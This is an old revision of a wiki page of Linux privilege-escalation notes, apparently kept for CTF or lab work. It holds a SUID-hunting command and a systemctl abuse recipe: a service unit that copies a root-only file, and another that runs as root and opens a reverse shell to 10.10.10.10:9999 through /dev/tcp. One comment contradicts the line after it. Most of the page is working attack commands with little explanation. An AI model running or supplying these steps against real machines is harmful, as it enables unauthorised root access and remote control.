This is an old revision of the document!


Privesc GNU/Linux

SUID

find / -user root -perm -4000 -print 2>/dev/null

List of common SUID binaries

/bin/fusermount
/bin/mount
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/sbin/mount.cifs
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/squid/pinger
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

SUID systemctl

https://gtfobins.github.io/gtfobins/systemctl/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
https://www.jil-wright.com/blog/tryhackmevulnversity

cd /bin
sh

sh -p

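# TF is never set on this page; the GTFOBins entry linked above uses a temporary .service path.
TF=$(mktemp).service
echo '[Service]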
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output.txt"
[Install]
WantedBy=multi-user.target' > $TF

./systemctl link $TF

./systemctl enable --now $TF

cat /tmp/output.txt

[Unit]
Description=roooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
WantedBy=multi-user.target
procedures/privesc_gnu_linux.1621873030.txt.gz · Last modified: 2021/05/24 18:17 by didzkovitchz